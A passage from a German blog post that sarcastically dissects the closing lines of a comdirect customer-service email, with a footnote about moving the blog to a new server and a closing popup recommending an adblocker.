Vielen Dank für Ihr Verständnis und Ihr Vertrauen in die comdirect.

…natürlich wird mir für mein (nicht vorhandenes) Verständnis und (bei Banken auf unterirdischem Niveau liegendes) Vertrauen gedankt.

Mit freundlichen Grußen,

Mit fehlenden Punkten über dem „u“,

Kundendienst

Unpersönlich-technische Selbstbezeichnung.

¹Ich habe vor ein paar Wochen dieses Blog auf einen neuen Server umgezogen, und ich konnte eine Menge Anpassungen für die neue Umgebung mit ein paar Skripten erledigen. Datenverarbeitung ist keine schwarze Magie, sondern sie besteht darin, dass man die Maschine arbeiten lässt und sich selbst angenehmeren Dingen zuwendet.

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.